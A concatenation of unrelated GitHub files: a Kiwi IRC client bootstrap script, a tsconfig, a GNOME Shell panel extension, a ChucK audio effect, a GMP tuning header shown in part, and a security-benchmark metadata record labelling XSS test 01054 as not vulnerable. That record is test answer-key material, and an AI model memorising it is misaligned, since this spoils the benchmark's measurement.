a=document,b=a.getElementsByTagName("head")[0],c=/^https?:\/\//,d={},e={},f={},g,h={},i="string",j=!1,k="push",l="DOMContentLoaded",m="readyState",n="addEventListener",o="onreadystatechange";return!a[m]&&a[n]&&(a[n](l,function t(){a.removeEventListener(l,t,j),a[m]="complete"},j),a[m]="loading"),r.get=s,r.order=function(a,b,c){(function d(e){e=a.shift(),a.length?r(e,d):r(e,b,c)})()},r.path=function(a){g=a},r.ready=function(a,b,c){a=a[k]?a:[a];var e=[];return!q(a,function(a){d[a]||e[k](a)})&&p(a,function(a){return d[a]})?b():!function(a){f[a]=f[a]||[],f[a][k](b),c&&c(e)}(a.join("|")),r},r},this)
// Avoid `console` errors in browsers that lack a console. (https://github.com/h5bp/html5-boilerplate)
// Stub out any console methods the current browser does not implement so
// that stray logging calls never throw (h5bp boilerplate idiom).
function normalizeConsole() {
    var noop = function () {};
    var names = [
        'assert', 'clear', 'count', 'debug', 'dir', 'dirxml', 'error',
        'exception', 'group', 'groupCollapsed', 'groupEnd', 'info', 'log',
        'markTimeline', 'profile', 'profileEnd', 'table', 'time', 'timeEnd',
        'timeStamp', 'trace', 'warn'
    ];
    var console = (window.console = window.console || {});
    for (var i = 0; i < names.length; i++) {
        // Only stub methods the browser left undefined.
        if (!console[names[i]]) {
            console[names[i]] = noop;
        }
    }
}
normalizeConsole();
// Returns the decoded value of a query-string parameter from
// window.location.search, or undefined when the parameter is absent.
// '+' is treated as an encoded space, matching form encoding.
function getQueryVariable(variable) {
    var pairs = window.location.search.substring(1).split('&');
    for (var idx = 0; idx < pairs.length; idx++) {
        var parts = pairs[idx].replace(/\+/g, '%20').split('=');
        if (decodeURIComponent(parts[0]) === variable) {
            return decodeURIComponent(parts[1]);
        }
    }
}
// Bootstraps the Kiwi IRC client. Runs immediately; if the browser lacks
// native Promises it first loads a polyfill and re-invokes itself. It then
// queues the application scripts, fetches settings.json, and starts the app
// once both the window has loaded and the settings have arrived.
(function afterPromiseAvailable() {
var base_path = '<%base_path%>', // Entry path for the kiwi application
scripts = [],
opts = {
container: $('body'),
base_path: base_path,
settings_path: base_path + '/assets/settings.json',
locale: getQueryVariable('locale')
},
script_promise, script_promise_resolve,
onload_promise,
settings_promise;
// If the browser doesn't natively support promises load up the polyfill and try again.
if (!window.Promise) {
$script(base_path + "/assets/libs/promise.min.js", afterPromiseAvailable);
return;
}
// Loads one script path or an array of paths (relative to base_path) via
// $script, resolving when they have all loaded.
// NOTE(review): $script treats a function second argument as the done
// callback, so `reject` appears never to fire on load failure -- confirm.
function loadScripts(scripts) {
return new Promise(function (resolve, reject) {
var to_load, idx,
base = base_path + '/';
if (typeof scripts === 'string') {
to_load = base + scripts;
} else {
to_load = [];
for (idx in scripts) {
to_load.push(base + scripts[idx]);
}
}
$script(to_load, resolve, reject);
});
}
// Resolves when the page has finished loading.
onload_promise = new Promise(function (resolve) {
// Document may already be loaded if we had to load the Promise shim seperately
if (document.readyState === 'complete') {
resolve();
return;
}
window.onload = resolve;
});
// Get a resolve function for the script loading promises
script_promise = new Promise(function (resolve) {
script_promise_resolve = resolve;
});
// Chain each script loading promise: each entry of `scripts` is only
// loaded after the previous entry has finished, so dependencies such as
// lodash/backbone arrive in order.
script_promise = script_promise.then(function () {
var idx;
for (idx = 0; idx < scripts.length; idx++) {
(function (idx) {
script_promise = script_promise.then(function () {
return loadScripts(scripts[idx]);
});
})(idx);
}
});
// Debugging will get a list of debugging scripts from settings.json (below)
if (!getQueryVariable('debug')) {
scripts.push(['assets/libs/lodash.min.js?t=<%build_time%>']);
scripts.push([
'assets/libs/backbone.min.js?t=<%build_time%>',
'assets/libs/jed.js?t=<%build_time%>'
]);
scripts.push([
'assets/kiwi.min.js?t=<%build_time%>',
'assets/libs/engine.io.bundle.min.js?t=<%build_time%>'
]);
script_promise_resolve();
}
// Fetch settings.json and copy the interesting fields onto `opts`.
settings_promise = new Promise(function (resolve) {
$.getJSON(opts.settings_path, function (data) {
opts.server_settings = data.server_settings;
opts.client_plugins = data.client_plugins;
opts.translations = data.translations;
opts.themes = data.themes;
if (typeof data.kiwi_server !== 'undefined') {
opts.kiwi_server = data.kiwi_server;
}
resolve();
// If debugging, grab the debug scripts and load them
if (getQueryVariable('debug')) {
scripts = scripts.concat(data.scripts);
script_promise_resolve();
}
// Load themes
// Every theme stylesheet is appended to <head>; all but the
// configured one are flagged disabled.
if (opts.themes) {
$.each(opts.themes, function (theme_idx, theme) {
var disabled = (opts.server_settings.client.settings.theme.toLowerCase() !== theme.name.toLowerCase());
var link = $.parseHTML('<link rel="stylesheet" type="text/css" data-theme href="'+ opts.base_path + '/assets/themes/' + theme.name.toLowerCase() + '/style.css" title="' + theme.name.toLowerCase() + '" />');
$(link).appendTo($('head'));
if (disabled) {
// NOTE(review): `link` is the array returned by $.parseHTML,
// not the <link> element itself; this looks like it should be
// link[0].disabled -- confirm before relying on it.
link.disabled = disabled;
}
});
}
});
});
// prawnsalad: Why is the below script_promise in its own .then()?
// M2Ys4U: prawnsalad: either of the first two promises can resolve the
// third one, but the third one has a then() on it already, so the
// then() on the all() makes it wait for the then() on the script promise
// to resolve.
//
// Promises - simple.
Promise.all([onload_promise, settings_promise])
.then(function(){return script_promise})
.then(function startApp() {
// Kiwi IRC version this is built from
kiwi.build_version = '<%build_version%>';
// Start the app after loading plugins
kiwi.init(opts, function() {
if (opts.client_plugins && opts.client_plugins.length > 0) {
// Wait until all plugins are loaded before starting the app
kiwi.plugins.once('loaded', function() {
kiwi.start();
});
_.each(opts.client_plugins, function (plugin_url) {
kiwi.plugins.load(plugin_url);
});
} else {
// No plugins were needed so start the app
kiwi.start();
}
});
});
})();
</script>
</body>
</html>
| {
"pile_set_name": "Github"
} |
{
"compilerOptions": {
"module": "commonjs",
"lib": [
"es6"
],
"noImplicitAny": true,
"noImplicitThis": true,
"strictNullChecks": true,
"strictFunctionTypes": true,
"baseUrl": "../",
"typeRoots": [
"../"
],
"types": [],
"noEmit": true,
"forceConsistentCasingInFileNames": true
},
"files": [
"index.d.ts",
"eslint-plugin-prettier-tests.ts"
]
}
| {
"pile_set_name": "Github"
} |
const Gi = imports._gi
const System = imports.system
const GObject = imports.gi.GObject
const Clutter = imports.gi.Clutter
const Shell = imports.gi.Shell
const AppSystem = imports.gi.Shell.AppSystem.get_default()
const WinTracker = imports.gi.Shell.WindowTracker.get_default()
const Main = imports.ui.main
const Config = imports.misc.config
const Unite = imports.misc.extensionUtils.getCurrentExtension()
const AppMenu = Main.panel.statusArea.appMenu
const Activities = Main.panel.statusArea.activities
const Buttons = Unite.imports.buttons
const Handlers = Unite.imports.handlers
const VERSION = parseInt(Config.PACKAGE_VERSION.split('.')[1])
// Base class for panel tweaks that can be switched on and off at runtime.
// A subclass implements _init()/_destroy(); this wrapper watches one
// settings key and invokes them whenever `callback(settings value)` flips
// between active and inactive.
var PanelExtension = class PanelExtension {
  constructor(settings, key, callback) {
    this.activated = false

    // True when the current value of `key` means this extension should run.
    const isActive = () => {
      return callback.call(null, settings.get(key))
    }

    // Re-evaluate on every settings change; (de)activate exactly once per
    // transition.
    const onChange = () => {
      const shouldRun = isActive()
      if (shouldRun && !this.activated) {
        this.activated = true
        return this._init()
      }
      if (!shouldRun && this.activated) {
        this.activated = false
        return this._destroy()
      }
    }

    // Start watching the key and apply the current state immediately.
    this.activate = () => {
      settings.connect(key, onChange.bind(this))
      onChange()
    }

    // Tear down if currently active; safe to call when inactive.
    this.destroy = () => {
      if (this.activated) {
        this._destroy()
        this.activated = false
      }
    }
  }
}
// Window control buttons (close/minimize/maximize) rendered in the top
// panel. Active unless 'show-window-buttons' is 'never'.
var WindowButtons = class WindowButtons extends PanelExtension {
constructor({ settings }) {
const active = val => val != 'never'
super(settings, 'show-window-buttons', active)
}
_init() {
// Style class currently applied; replaced on the first _onThemeChange().
this.theme = 'default-dark'
this.signals = new Handlers.Signals()
this.settings = new Handlers.Settings()
this.styles = new Handlers.Styles()
this.controls = new Buttons.WindowControls()
// Button visibility follows the overview state and the focused app.
this.signals.connect(
Main.overview, 'showing', this._syncVisible.bind(this)
)
this.signals.connect(
Main.overview, 'hiding', this._syncVisible.bind(this)
)
this.signals.connect(
WinTracker, 'notify::focus-app', this._syncVisible.bind(this)
)
// Re-place or re-skin the controls when the related settings change.
this.settings.connect(
'button-layout', this._onPositionChange.bind(this)
)
this.settings.connect(
'window-buttons-placement', this._onPositionChange.bind(this)
)
this.settings.connect(
'window-buttons-theme', this._onThemeChange.bind(this)
)
Main.panel.addToStatusArea(
'uniteWindowControls', this.controls, this.index, this.side
)
this._onPositionChange()
this._onThemeChange()
this._syncVisible()
}
// Side the buttons occupy in a native titlebar (from settings).
get position() {
return this.settings.get('window-buttons-position')
}
// Requested panel placement: 'first', 'last', 'auto' or an explicit side.
get placement() {
return this.settings.get('window-buttons-placement')
}
// Panel side to attach to; 'auto' falls back to the titlebar position.
get side() {
const sides = { first: 'left', last: 'right', auto: this.position }
return sides[this.placement] || this.placement
}
// Child index inside the panel box, or null to position next to a sibling.
get index() {
if (this.placement == 'first') return 0
if (this.placement == 'last') return -1
return null
}
// Panel item to slot the controls against when no index applies.
get sibling() {
if (this.side == 'left') {
return Main.panel.statusArea.appMenu.get_parent()
} else {
return Main.panel.statusArea.aggregateMenu.get_parent()
}
}
// Panel box (left or right) that should own the controls.
get container() {
if (this.side == 'left') {
return Main.panel._leftBox
} else {
return Main.panel._rightBox
}
}
_onLayoutChange() {
const buttons = this.settings.get('window-buttons-layout')
// Mirror the button order when shown on the opposite side from the
// native titlebar layout.
if (this.side != this.position) {
buttons.reverse()
}
this.controls.addButtons(buttons)
this._syncVisible()
}
_onPositionChange() {
const controls = this.controls.container
// Some Clutter versions expose reparent(); otherwise an explicit
// remove/add pair is needed -- presumably why both paths exist.
if (controls.reparent) {
controls.reparent(this.container)
} else {
const currentParent = controls.get_parent()
if (currentParent) {
currentParent.remove_child(controls)
this.container.add_child(controls)
}
}
if (this.index != null) {
this.container.set_child_at_index(controls, this.index)
} else {
this.container.set_child_below_sibling(controls, this.sibling)
}
this._onLayoutChange()
}
_onThemeChange() {
// Swap the style class and load the new theme's stylesheet.
this.controls.remove_style_class_name(this.theme)
this.theme = this.settings.get('window-buttons-theme')
const path = `themes/${this.theme}/stylesheet.css`
this.styles.addShellStyle('windowButtons', path)
this.controls.add_style_class_name(this.theme)
}
_syncVisible() {
const overview = Main.overview.visibleTarget
const focusApp = WinTracker.focus_app || AppMenu._targetApp
// Show only outside the overview, with a running focused app whose
// current window wants buttons shown.
if (!overview && focusApp && focusApp.state == Shell.AppState.RUNNING) {
const win = global.unite.focusWindow
this.controls.setVisible(win && win.showButtons)
} else {
this.controls.setVisible(false)
}
}
_destroy() {
this.controls.destroy()
this.signals.disconnectAll()
this.settings.disconnectAll()
this.styles.removeAll()
}
}
// Widens the panel's left box to take all width left over by the centre
// and right boxes, by overriding the panel's allocate vfunc.
// Active while 'extend-left-box' is true.
var ExtendLeftBox = class ExtendLeftBox extends PanelExtension {
constructor({ settings }) {
const active = val => val == true
super(settings, 'extend-left-box', active)
}
_init() {
// Keep the stock implementation so _destroy() can restore it.
this._default = Main.panel.__proto__.vfunc_allocate
// Shell versions below 37 pass allocation flags to vfunc_allocate;
// later versions dropped the second argument, hence the two variants.
if (VERSION < 37) {
Main.panel.__proto__[Gi.hook_up_vfunc_symbol]('allocate', (box, flags) => {
Main.panel.vfunc_allocate.call(Main.panel, box, flags)
this._allocate(Main.panel, box, flags)
})
} else {
Main.panel.__proto__[Gi.hook_up_vfunc_symbol]('allocate', (box) => {
Main.panel.vfunc_allocate.call(Main.panel, box)
this._allocate(Main.panel, box)
})
}
Main.panel.queue_relayout()
}
// Version-compatible Clutter allocate() call (see VERSION note above).
_boxAllocate(box, childBox, flags) {
if (VERSION < 37) {
box.allocate(childBox, flags)
} else {
box.allocate(childBox)
}
}
// Re-distributes the panel width: right and centre boxes get their
// natural widths, the left box receives whatever remains (capped at its
// own natural width). Mirrored for right-to-left text direction.
_allocate(actor, box, flags) {
let leftBox = Main.panel._leftBox
let centerBox = Main.panel._centerBox
let rightBox = Main.panel._rightBox
let allocWidth = box.x2 - box.x1
let allocHeight = box.y2 - box.y1
let [leftMinWidth, leftNaturalWidth] = leftBox.get_preferred_width(-1)
let [centerMinWidth, centerNaturalWidth] = centerBox.get_preferred_width(-1)
let [rightMinWidth, rightNaturalWidth] = rightBox.get_preferred_width(-1)
let sideWidth = allocWidth - rightNaturalWidth - centerNaturalWidth
let childBox = new Clutter.ActorBox()
// Left box: all space not claimed by centre + right.
childBox.y1 = 0
childBox.y2 = allocHeight
if (actor.get_text_direction() == Clutter.TextDirection.RTL) {
childBox.x1 = allocWidth - Math.min(Math.floor(sideWidth), leftNaturalWidth)
childBox.x2 = allocWidth
} else {
childBox.x1 = 0
childBox.x2 = Math.min(Math.floor(sideWidth), leftNaturalWidth)
}
this._boxAllocate(leftBox, childBox, flags)
// Centre box: sits directly against the right box.
childBox.y1 = 0
childBox.y2 = allocHeight
if (actor.get_text_direction() == Clutter.TextDirection.RTL) {
childBox.x1 = rightNaturalWidth
childBox.x2 = childBox.x1 + centerNaturalWidth
} else {
childBox.x1 = allocWidth - centerNaturalWidth - rightNaturalWidth
childBox.x2 = childBox.x1 + centerNaturalWidth
}
this._boxAllocate(centerBox, childBox, flags)
// Right box: pinned to the trailing edge at its natural width.
childBox.y1 = 0
childBox.y2 = allocHeight
if (actor.get_text_direction() == Clutter.TextDirection.RTL) {
childBox.x1 = 0
childBox.x2 = rightNaturalWidth
} else {
childBox.x1 = allocWidth - rightNaturalWidth
childBox.x2 = allocWidth
}
this._boxAllocate(rightBox, childBox, flags)
}
_destroy() {
// Re-install the original allocate implementation and relayout.
Main.panel.__proto__[Gi.hook_up_vfunc_symbol]('allocate', this._default)
this._default = null
Main.panel.queue_relayout()
}
}
var ActivitiesButton = class ActivitiesButton extends PanelExtension {
constructor({ settings }) {
const active = val => val != 'never'
super(settings, 'hide-activities-button', active)
}
_init() {
this.signals = new Handlers.Signals()
this.settings = new Handlers.Settings()
this.signals.connect(
Main.overview, 'showing', this._syncVisible.bind(this)
)
this.signals.connect(
Main.overview, 'hiding', this._syncVisible.bind(this)
)
this.signals.connect(
AppSystem, 'app-state-changed', this._syncVisible.bind(this)
)
this.signals.connect(
WinTracker, 'notify::focus-app', this._syncVisible.bind(this)
)
this.settings.connect(
'show-desktop-name', this._syncVisible.bind(this)
)
this._syncVisible()
}
get hideButton() {
return this.settings.get('hide-activities-button')
}
get showDesktop() {
return this.settings.get('show-desktop-name')
}
_syncVisible() {
const button = Activities.container
const overview = Main.overview.visibleTarget
const focusApp = WinTracker.focus_app || AppMenu._targetApp
if (this.hideButton == 'always') {
return button.hide()
}
if (this.showDesktop) {
button.visible = overview
} else {
button.visible = overview || focusApp == null
}
}
_destroy() {
if (!Main.overview.isDummy) {
Activities.container.show()
}
this.signals.disconnectAll()
this.settings.disconnectAll()
}
}
// Shows a configurable text label in the panel whenever the overview is
// closed and no application is focused. Active while 'show-desktop-name'
// is true.
var DesktopName = class DesktopName extends PanelExtension {
  constructor({ settings }) {
    const active = val => val == true
    super(settings, 'show-desktop-name', active)
  }

  _init() {
    this.signals = new Handlers.Signals()
    this.settings = new Handlers.Settings()
    this.label = new Buttons.DesktopLabel()

    // Re-check visibility whenever focus or the overview state changes.
    this.signals.connect(Main.overview, 'showing', this._syncVisible.bind(this))
    this.signals.connect(Main.overview, 'hiding', this._syncVisible.bind(this))
    this.signals.connect(AppSystem, 'app-state-changed', this._syncVisible.bind(this))
    this.signals.connect(WinTracker, 'notify::focus-app', this._syncVisible.bind(this))

    this.settings.connect('desktop-name-text', this._onTextChanged.bind(this))

    Main.panel.addToStatusArea('uniteDesktopLabel', this.label, 1, 'left')

    this._onTextChanged()
    this._syncVisible()
  }

  // Visible only on the bare desktop: overview closed, nothing focused.
  _syncVisible() {
    const inOverview = Main.overview.visibleTarget
    const focused = WinTracker.focus_app || AppMenu._targetApp
    this.label.setVisible(!inOverview && focused == null)
  }

  _onTextChanged() {
    this.label.setText(this.settings.get('desktop-name-text'))
  }

  _destroy() {
    this.label.destroy()
    this.signals.disconnectAll()
    this.settings.disconnectAll()
  }
}
// Hosts legacy XEmbed status icons in the panel while 'show-legacy-tray'
// is true.
var TrayIcons = class TrayIcons extends PanelExtension {
constructor({ settings }) {
const active = val => val == true
super(settings, 'show-legacy-tray', active)
}
_init() {
this.tray = new Shell.TrayManager()
this.settings = new Handlers.Settings()
this.indicators = new Buttons.TrayIndicator()
// Mirror tray icon additions/removals into our indicator widget.
this.tray.connect(
'tray-icon-added', this._onIconAdded.bind(this)
)
this.tray.connect(
'tray-icon-removed', this._onIconRemoved.bind(this)
)
this.settings.connect(
'greyscale-tray-icons', this._onGreyscaleChange.bind(this)
)
Main.panel.addToStatusArea(
'uniteTrayIndicator', this.indicators, 0, 'right'
)
this.tray.manage_screen(Main.panel)
}
// Applies (or clears) the greyscale look: full desaturation plus a small
// brightness/contrast lift to keep the icons legible.
_desaturateIcon(icon) {
const greyscale = this.settings.get('greyscale-tray-icons')
icon.clear_effects()
if (greyscale) {
const desEffect = new Clutter.DesaturateEffect({ factor : 1.0 })
const briEffect = new Clutter.BrightnessContrastEffect({})
briEffect.set_brightness(0.2)
briEffect.set_contrast(0.3)
icon.add_effect_with_name('desaturate', desEffect)
icon.add_effect_with_name('brightness-contrast', briEffect)
}
}
_onIconAdded(trayManager, icon) {
this.indicators.addIcon(icon)
this._desaturateIcon(icon)
}
_onIconRemoved(trayManager, icon) {
this.indicators.removeIcon(icon)
}
// Re-apply the effect to every icon when the setting flips.
_onGreyscaleChange() {
this.indicators.forEach(this._desaturateIcon.bind(this))
}
_destroy() {
// NOTE(review): dropping the only reference and forcing a GC appears to
// be what tears the TrayManager down (GJS finalization) -- confirm.
this.tray = null
System.gc()
this.indicators.destroy()
this.settings.disconnectAll()
}
}
// Aggregates every panel tweak. Each sub-extension receives this manager
// (destructured for its `settings`) and toggles itself on/off via the
// PanelExtension machinery when its settings key changes.
var PanelManager = GObject.registerClass(
class UnitePanelManager extends GObject.Object {
_init() {
this.settings = new Handlers.Settings()
this.buttons = new WindowButtons(this)
this.extender = new ExtendLeftBox(this)
this.activities = new ActivitiesButton(this)
this.desktop = new DesktopName(this)
this.tray = new TrayIcons(this)
}
// Start watching settings; each part activates itself if enabled.
activate() {
this.buttons.activate()
this.extender.activate()
this.activities.activate()
this.desktop.activate()
this.tray.activate()
}
// Tear every part down and drop all settings connections.
destroy() {
this.buttons.destroy()
this.extender.destroy()
this.activities.destroy()
this.desktop.destroy()
this.tray.destroy()
this.settings.disconnectAll()
}
}
)
| {
"pile_set_name": "Github"
} |
/*
LiCK Library for ChucK.
Copyright (c) 2007-2020 held jointly by the individual authors.
This file is part of LiCK.
LiCK is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
LiCK is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with LiCK. If not, see <http://www.gnu.org/licenses/>.
*/
// Chugen pass-through that follows the tracked input pitch and retunes two
// square-wave oscillators to one and two octaves below it on every sample.
class Follower extends Chugen
{
// Assigned externally before use (see BlueBox3's wiring below).
SqrOsc @ osc1;
SqrOsc @ osc2;
PitchTrack @ pitchTrack;
fun float tick(float in)
{
// Current pitch estimate from the shared tracker.
pitchTrack.get() => float freq;
freq/2.0 => osc1.freq;
freq/4.0 => osc2.freq;
// Audio passes through unchanged; this Chugen is control-only.
return in;
}
}
// Octave-divider effect: tracks the input pitch, drives two sub-octave
// square waves through a Gen17 waveshaper, and mixes the shaped signal
// with the dry input via the Effect base class (inlet/wet).
class BlueBox3 extends Effect
{
SqrOsc osc1;
SqrOsc osc2;
PitchTrack pitchTrack;
Follower follower;
// Sub-octave balance: one octave down twice as loud as two octaves down.
0.66 => osc1.gain;
0.33 => osc2.gain;
256 => pitchTrack.frame;
1 => pitchTrack.overlap;
// Hand the follower references to the objects it retunes/reads.
osc1 @=> follower.osc1;
osc2 @=> follower.osc2;
pitchTrack @=> follower.pitchTrack;
Gen17 gen17;
// Harmonic weights for the waveshaper; the helpers below treat indices
// 1,3,5 as the "even" set and 0,2,4,6 as the "odd" set.
[1.0, 0.5, 0.25, 0.125, 0.06, 0.03, 0.015] @=> float coefs[];
coefs => gen17.coefs;
// Audio graph: input feeds the follower and pitch tracker (analysis
// only, routed to blackhole); the oscillators feed the shaper -> wet.
inlet => follower => blackhole;
inlet => pitchTrack => blackhole;
osc1 => gen17;
osc2 => gen17;
gen17 => wet;
// Boost the even-set coefficients by 10% and re-apply them.
fun void moreEvens()
{
coefs[1] * 1.1 => coefs[1];
coefs[3] * 1.1 => coefs[3];
coefs[5] * 1.1 => coefs[5];
coefs => gen17.coefs;
}
// Cut the even-set coefficients by 20% and re-apply them.
fun void lessEvens()
{
coefs[1] * 0.8 => coefs[1];
coefs[3] * 0.8 => coefs[3];
coefs[5] * 0.8 => coefs[5];
coefs => gen17.coefs;
}
// Boost the odd-set coefficients by 10% and re-apply them.
fun void moreOdds()
{
coefs[0] * 1.1 => coefs[0];
coefs[2] * 1.1 => coefs[2];
coefs[4] * 1.1 => coefs[4];
coefs[6] * 1.1 => coefs[6];
coefs => gen17.coefs;
}
// Cut the odd-set coefficients by 20% and re-apply them.
fun void lessOdds()
{
coefs[0] * 0.8 => coefs[0];
coefs[2] * 0.8 => coefs[2];
coefs[4] * 0.8 => coefs[4];
coefs[6] * 0.8 => coefs[6];
coefs => gen17.coefs;
}
}
// Demo: run the BlueBox3 effect on the live input at 33% wet, stepping the
// waveshaper gain from 0.8 to 1.5 over eight one-minute intervals.
BlueBox3 blueBox;
0.33 => blueBox.mix;
adc => blueBox => dac;
for (0 => int i; i < 8; i++)
{
0.8 + i * 0.1 => float gain;
gain => blueBox.gen17.gain;
<<<"gain", gain>>>;
1::minute => now;
}
<<<"done">>>;
| {
"pile_set_name": "Github"
} |
<test-metadata>
<benchmark-version>1.2</benchmark-version>
<category>xss</category>
<test-number>01054</test-number>
<vulnerability>false</vulnerability>
<cwe>79</cwe>
</test-metadata>
| {
"pile_set_name": "Github"
} |
/* Nehalem gmp-mparam.h -- Compiler/machine parameter header file.
Copyright 1991, 1993, 1994, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007,
2008, 2009, 2010, 2011, 2012 Free Software Foundation, Inc.
This file is part of the GNU MP Library.
The GNU MP Library is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 3 of the License, or (at your
option) any later version.
The GNU MP Library is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
License for more details.
You should have received a copy of the GNU Lesser General Public License
along with the GNU MP Library. If not, see http://www.gnu.org/licenses/. */
#define GMP_LIMB_BITS 64
#define BYTES_PER_MP_LIMB 8
/* 2667 MHz Core i7 Nehalem */
#define MOD_1_NORM_THRESHOLD 0 /* always */
#define MOD_1_UNNORM_THRESHOLD 0 /* always */
#define MOD_1N_TO_MOD_1_1_THRESHOLD 3
#define MOD_1U_TO_MOD_1_1_THRESHOLD 3
#define MOD_1_1_TO_MOD_1_2_THRESHOLD 11
#define MOD_1_2_TO_MOD_1_4_THRESHOLD 16
#define PREINV_MOD_1_TO_MOD_1_THRESHOLD 9
#define USE_PREINV_DIVREM_1 1 /* native */
#define DIV_QR_2_PI2_THRESHOLD MP_SIZE_T_MAX /* never */
#define DIVEXACT_1_THRESHOLD 0 /* always (native) */
#define BMOD_1_TO_MOD_1_THRESHOLD 16
#define MUL_TOOM22_THRESHOLD 18
#define MUL_TOOM33_THRESHOLD 57
#define MUL_TOOM44_THRESHOLD 169
#define MUL_TOOM6H_THRESHOLD 222
#define MUL_TOOM8H_THRESHOLD 288
#define MUL_TOOM32_TO_TOOM43_THRESHOLD 65
#define MUL_TOOM32_TO_TOOM53_THRESHOLD 108
#define MUL_TOOM42_TO_TOOM53_THRESHOLD 99
#define MUL_TOOM42_TO_TOOM63_THRESHOLD 105
#define MUL_TOOM43_TO_TOOM54_THRESHOLD 82
#define SQR_BASECASE_THRESHOLD 0 /* always (native) */
#define SQR_TOOM2_THRESHOLD 30
#define SQR_TOOM3_THRESHOLD 101
#define SQR_TOOM4_THRESHOLD 250
#define SQR_TOOM6_THRESHOLD 306
#define SQR_TOOM8_THRESHOLD 454
#define MULMID_TOOM42_THRESHOLD 22
#define MULMOD_BNM1_THRESHOLD 11
#define SQRMOD_BNM1_THRESHOLD 13
#define MUL_FFT_MODF_THRESHOLD 380 /* k = 5 */
#define MUL_FFT_TABLE3 \
{ { 380, 5}, { 17, 6}, { 9, 5}, { 19, 6}, \
{ 10, 5}, { 21, 6}, { 11, 5}, { 23, 6}, \
{ 21, 7}, { 11, 6}, { 23, 7}, { 21, 8}, \
{ 11, 7}, { 24, 8}, { 13, 7}, { 27, 8}, \
{ 15, 7}, { 31, 8}, { 21, 9}, { 11, 8}, \
{ 27, 9}, { 15, 8}, { 33, 9}, { 19, 8}, \
{ 39, 9}, { 23, 8}, { 47, 9}, { 27,10}, \
{ 15, 9}, { 39,10}, { 23, 9}, { 47,11}, \
{ 15,10}, { 31, 9}, { 67,10}, { 39, 9}, \
{ 79,10}, { 47, 9}, { 95,10}, { 55,11}, \
{ 31,10}, { 79,11}, { 47,10}, { 95,12}, \
{ 31,11}, { 63,10}, { 135,11}, { 79,10}, \
{ 159,11}, { 95,10}, { 191, 9}, { 383,12}, \
{ 63,11}, { 127,10}, { 255, 9}, { 511,11}, \
{ 143,10}, { 287, 9}, { 575,10}, { 303,11}, \
{ 159,10}, { 319,12}, { 95,11}, { 191,10}, \
{ 383,11}, { 207,13}, { 63,12}, { 127,11}, \
{ 255,10}, { 511,11}, { 271,10}, { 543,11}, \
{ 287,10}, { 575,11}, { 303,12}, { 159,11}, \
{ 319,10}, { 639,11}, { 351,10}, { 703,12}, \
{ 191,11}, { 383,10}, { 767,11}, { 415,10}, \
{ 831,12}, { 223,11}, { 447,10}, { 895,13}, \
{ 127,12}, { 255,11}, { 511,10}, { 1023,11}, \
{ 543,12}, { 287,11}, { 607,12}, { 319,11}, \
{ 639,12}, { 351,11}, { 703,10}, { 1407,13}, \
{ 191,12}, { 383,11}, { 767,12}, { 415,11}, \
{ 831,10}, { 1663,12}, { 447,11}, { 895,12}, \
{ 479,14}, { 127,13}, { 255,12}, { 511,11}, \
{ 1023,12}, { 543,11}, { 1087,12}, { 575,11}, \
{ 1151,12}, { 607,13}, { 319,12}, { 703,11}, \
{ 1407,13}, { 383,12}, { 831,11}, { 1663,13}, \
{ 447,12}, { 959,11}, { 1919,14}, { 16384,15}, \
{ 32768,16}, { 65536,17}, { 131072,18}, { 262144,19}, \
{ 524288,20}, {1048576,21}, {2097152,22}, {4194304,23}, \
{8388608,24} }
#define MUL_FFT_TABLE3_SIZE 137
#define MUL_FFT_THRESHOLD 3712
#define SQR_FFT_MODF_THRESHOLD 304 /* k = 5 */
#define SQR_FFT_TABLE3 \
{ { 304, 5}, { 17, 6}, { 9, 5}, { 19, 6}, \
{ 21, 7}, { 11, 6}, { 23, 7}, { 21, 8}, \
{ 11, 7}, { 24, 8}, { 13, 7}, { 27, 8}, \
{ 15, 7}, { 31, 8}, { 21, 9}, { 11, 8}, \
{ 27, 9}, { 15, 8}, { 33, 9}, { 19, 8}, \
{ 41, 9}, { 23, 8}, { 47, 9}, { 27,10}, \
{ 15, 9}, { 39,10}, { 23, 9}, { 47,11}, \
{ 15,10}, { 31, 9}, { 67,10}, { 39, 9}, \
{ 79,10}, { 47,11}, { 31,10}, { 79,11}, \
{ 47,12}, { 31,11}, { 63,10}, { 127, 9}, \
{ 255,11}, { 79,10}, { 159, 9}, { 319,11}, \
{ 95,10}, { 191, 9}, { 383,12}, { 63,11}, \
{ 127,10}, { 255, 9}, { 511,10}, { 271, 9}, \
{ 543,11}, { 143,10}, { 287, 9}, { 575,11}, \
{ 159,10}, { 319,11}, { 175,12}, { 95,11}, \
{ 191,10}, { 383,11}, { 207,13}, { 63,12}, \
{ 127,11}, { 255,10}, { 511,11}, { 271,10}, \
{ 543,11}, { 287,10}, { 575,12}, { 159,11}, \
{ 319,10}, { 639,11}, { 351,10}, { 703,12}, \
{ 191,11}, { 383,10}, { 767,11}, { 415,10}, \
{ 831,12}, { 223,11}, { 447,10}, { 895,11}, \
{ 479,13}, { 127,12}, { 255,11}, { 511,10}, \
{ 1023,11}, { 543,12}, { 287,11}, { 575,10}, \
{ 1151,12}, { 319,11}, { 639,12}, { 351,11}, \
{ 703,13}, { 191,12}, { 383,11}, { 767,12}, \
{ 415,11}, { 831,12}, { 447,11}, { 895,12}, \
{ 479,11}, { 959,14}, { 127,13}, { 255,12}, \
{ 511,11}, { 1023,12}, { 543,11}, { 1087,12}, \
{ 575,11}, { 1151,12}, { 607,13}, { 319,12}, \
{ 639,11}, { 1279,12}, { 703,11}, { 1407,13}, \
{ 383,12}, { 767,11}, { 1535,12}, { 831,13}, \
{ 447,12}, { 959,11}, { 1919,14}, { 16384,15}, \
{ 32768,16}, { 65536,17}, { 131072,18}, { 262144,19}, \
{ 524288,20}, {1048576,21}, {2097152,22}, {4194304,23}, \
{8388608,24} }
#define SQR_FFT_TABLE3_SIZE 137
#define SQR_FFT_THRESHOLD 3200
#define MULLO_BASECASE_THRESHOLD 0 /* always */
#define MULLO_DC_THRESHOLD 45
